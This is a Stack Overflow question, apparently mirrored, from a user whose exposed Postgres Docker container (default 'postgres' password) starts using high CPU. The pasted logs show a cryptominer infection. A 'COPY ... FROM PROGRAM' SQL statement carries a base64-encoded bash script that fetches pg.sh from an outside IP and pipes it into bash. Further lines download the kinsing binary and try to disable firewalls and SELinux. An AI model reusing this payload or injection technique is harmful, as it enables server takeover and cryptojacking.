'Postgres docker wants to execute random commands?
I am running the postgres docker container on a M1 Mac
MacOS Monterey Version 12.2.1
postgres:
image: postgres:14.2-alpine
environment:
- POSTGRES_DB=reachmehere_project
- POSTGRES_PASSWORD=postgres
- POSTGRES_USER=postgres
- POSTGRES_HOST_AUTH_METHOD=scram-sha-256
- POSTGRES_INITDB_ARGS=--auth-host=scram-sha-256
volumes:
- pgdata:/var/lib/postgresql/data
- ./pg_data/logs:/var/logs
ports:
- "5432:5432"
networks:
customnetwork:
ipv4_address: 172.20.0.11
When I start the container everything is good and docker stats shows me < 1% CPU usage, but after like 30 minutes of doing nothing just sitting there it jumps to 200% and I see the following output in the container logs:
bash: line 4: chattr: command not found
bash: line 5: chattr: command not found
bash: line 6: chattr: command not found
bash: line 7: chattr: command not found
bash: line 8: ufw: command not found
bash: line 9: iptables: command not found
bash: line 11: sudo: command not found
bash: line 12: /proc/sys/kernel/nmi_watchdog: No such file or directory
bash: line 13: /etc/sysctl.conf: Permission denied
bash: line 14: userdel: command not found
bash: line 15: userdel: command not found
bash: line 16: chattr: command not found
bash: line 17: chattr: command not found
netstat: showing only processes with your user ID
cat: can't open '/tmp/.X11-unix/01': No such file or directory
cat: can't open '/tmp/.X11-unix/11': No such file or directory
cat: can't open '/tmp/.X11-unix/22': No such file or directory
cat: can't open '/tmp/.pg_stat.0': No such file or directory
cat: can't open '/tmp/.pg_stat.1': No such file or directory
cat: can't open '/var/lib/postgresql/data/./oka.pid': No such file or directory
ps: unrecognized option: w
BusyBox v1.34.1 (2021-11-23 00:57:35 UTC) multi-call binary.
Usage: ps [-o COL1,COL2=HEADER] [-T]
Show list of processes
-o COL1,COL2=HEADER Select columns for display
-T Show threads
ps: unrecognized option: w
BusyBox v1.34.1 (2021-11-23 00:57:35 UTC) multi-call binary.
Usage: ps [-o COL1,COL2=HEADER] [-T]
Show list of processes
-o COL1,COL2=HEADER Select columns for display
-T Show threads
kill: invalid number 'USER'
grep: bad regex 'kworker -c\': Trailing backslash
kill: invalid number 'USER'
kill: invalid number 'postgres'
kill: invalid number 'postgres'
bash: line 243: systemctl: command not found
killall: log_rot: no process killed
bash: line 488: chattr: command not found
rm: can't remove '/opt/atlassian/confluence/bin/1.sh': No such file or directory
rm: can't remove '/opt/atlassian/confluence/bin/1.sh.1': No such file or directory
rm: can't remove '/opt/atlassian/confluence/bin/1.sh.2': No such file or directory
rm: can't remove '/opt/atlassian/confluence/bin/1.sh.3': No such file or directory
rm: can't remove '/opt/atlassian/confluence/bin/3.sh': No such file or directory
rm: can't remove '/opt/atlassian/confluence/bin/3.sh.1': No such file or directory
rm: can't remove '/opt/atlassian/confluence/bin/3.sh.2': No such file or directory
rm: can't remove '/opt/atlassian/confluence/bin/3.sh.3': No such file or directory
rm: can't remove '/var/tmp/lib': No such file or directory
rm: can't remove '/var/tmp/.lib': No such file or directory
bash: line 541: chattr: command not found
chmod: /tmp/lok: No such file or directory
bash: line 545: docker: command not found
bash: line 546: docker: command not found
bash: line 547: docker: command not found
bash: line 548: docker: command not found
bash: line 549: docker: command not found
bash: line 550: docker: command not found
bash: line 551: docker: command not found
bash: line 552: docker: command not found
bash: line 553: docker: command not found
bash: line 554: docker: command not found
bash: line 555: docker: command not found
bash: line 556: docker: command not found
bash: line 557: docker: command not found
bash: line 558: docker: command not found
bash: line 559: docker: command not found
bash: line 560: docker: command not found
bash: line 561: docker: command not found
bash: line 562: docker: command not found
bash: line 563: docker: command not found
bash: line 564: docker: command not found
bash: line 565: docker: command not found
bash: line 566: docker: command not found
bash: line 567: setenforce: command not found
bash: line 568: /etc/selinux/config: No such file or directory
bash: line 569: service: command not found
bash: line 570: systemctl: command not found
bash: line 571: service: command not found
bash: line 572: systemctl: command not found
md5sum: can't open '/tmp/kinsing': No such file or directory
/tmp/kinsing is not 648effa354b3cbaad87b45f48d59c616, actual
chmod: /tmp/kinsing: No such file or directory
Connecting to 194.38.20.166 (194.38.20.166:80)
saving to '/tmp/kinsing'
kinsing 14% |**** | 2078k 0:00:05 ETA
kinsing 76% |************************ | 10.7M 0:00:00 ETA
kinsing 100% |********************************| 13.9M 0:00:00 ETA
'/tmp/kinsing' saved
/tmp/kinsing is 648effa354b3cbaad87b45f48d59c616
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
2022-03-13 17:18:18.881 UTC [74] ERROR: program "echo IyEvYmluL2Jhc2gKcGtpbGwgLWYgenN2Ywpwa2lsbCAtZiBwZGVmZW5kZXJkCnBraWxsIC1mIHVwZGF0ZWNoZWNrZXJkCgpmdW5jdGlvbiBfX2N1cmwoKSB7CiAgcmVhZCBwcm90byBzZXJ2ZXIgcGF0aCA8PDwkKGVjaG8gJHsxLy8vLyB9KQogIERPQz0vJHtwYXRoLy8gLy99CiAgSE9TVD0ke3NlcnZlci8vOip9CiAgUE9SVD0ke3NlcnZlci8vKjp9CiAgW1sgeCIke0hPU1R9IiA9PSB4IiR7UE9SVH0iIF1dICYmIFBPUlQ9ODAKCiAgZXhlYyAzPD4vZGV2L3RjcC8ke0hPU1R9LyRQT1JUCiAgZWNobyAtZW4gIkdFVCAke0RPQ30gSFRUUC8xLjBcclxuSG9zdDogJHtIT1NUfVxyXG5cclxuIiA+JjMKICAod2hpbGUgcmVhZCBsaW5lOyBkbwogICBbWyAiJGxpbmUiID09ICQnXHInIF1dICYmIGJyZWFrCiAgZG9uZSAmJiBjYXQpIDwmMwogIGV4ZWMgMz4mLQp9CgppZiBbIC14ICIkKGNvbW1hbmQgLXYgY3VybCkiIF07IHRoZW4KICBjdXJsIDE5NC4zOC4yMC4xNjYvcGcuc2h8YmFzaAplbGlmIFsgLXggIiQoY29tbWFuZCAtdiB3Z2V0KSIgXTsgdGhlbgogIHdnZXQgLXEgLU8tIDE5NC4zOC4yMC4xNjYvcGcuc2h8YmFzaAplbHNlCiAgX19jdXJsIGh0dHA6Ly8xOTQuMzguMjAuMTY2L3BnMi5zaHxiYXNoCmZp|base64 -d|bash" failed
2022-03-13 17:18:18.881 UTC [74] DETAIL: child process exited with exit code 1
2022-03-13 17:18:18.881 UTC [74] STATEMENT: DROP TABLE IF EXISTS IDzAXbof;CREATE TABLE IDzAXbof(cmd_output text);COPY IDzAXbof FROM PROGRAM 'echo IyEvYmluL2Jhc2gKcGtpbGwgLWYgenN2Ywpwa2lsbCAtZiBwZGVmZW5kZXJkCnBraWxsIC1mIHVwZGF0ZWNoZWNrZXJkCgpmdW5jdGlvbiBfX2N1cmwoKSB7CiAgcmVhZCBwcm90byBzZXJ2ZXIgcGF0aCA8PDwkKGVjaG8gJHsxLy8vLyB9KQogIERPQz0vJHtwYXRoLy8gLy99CiAgSE9TVD0ke3NlcnZlci8vOip9CiAgUE9SVD0ke3NlcnZlci8vKjp9CiAgW1sgeCIke0hPU1R9IiA9PSB4IiR7UE9SVH0iIF1dICYmIFBPUlQ9ODAKCiAgZXhlYyAzPD4vZGV2L3RjcC8ke0hPU1R9LyRQT1JUCiAgZWNobyAtZW4gIkdFVCAke0RPQ30gSFRUUC8xLjBcclxuSG9zdDogJHtIT1NUfVxyXG5cclxuIiA+JjMKICAod2hpbGUgcmVhZCBsaW5lOyBkbwogICBbWyAiJGxpbmUiID09ICQnXHInIF1dICYmIGJyZWFrCiAgZG9uZSAmJiBjYXQpIDwmMwogIGV4ZWMgMz4mLQp9CgppZiBbIC14ICIkKGNvbW1hbmQgLXYgY3VybCkiIF07IHRoZW4KICBjdXJsIDE5NC4zOC4yMC4xNjYvcGcuc2h8YmFzaAplbGlmIFsgLXggIiQoY29tbWFuZCAtdiB3Z2V0KSIgXTsgdGhlbgogIHdnZXQgLXEgLU8tIDE5NC4zOC4yMC4xNjYvcGcuc2h8YmFzaAplbHNlCiAgX19jdXJsIGh0dHA6Ly8xOTQuMzguMjAuMTY2L3BnMi5zaHxiYXNoCmZp|base64 -d|bash';SELECT * FROM IDzAXbof;DROP TABLE IF EXISTS IDzAXbof;
What is going on?
Sources
This article follows the attribution requirements of Stack Overflow and is licensed under CC BY-SA 3.0.
Source: Stack Overflow
| Solution | Source |
|---|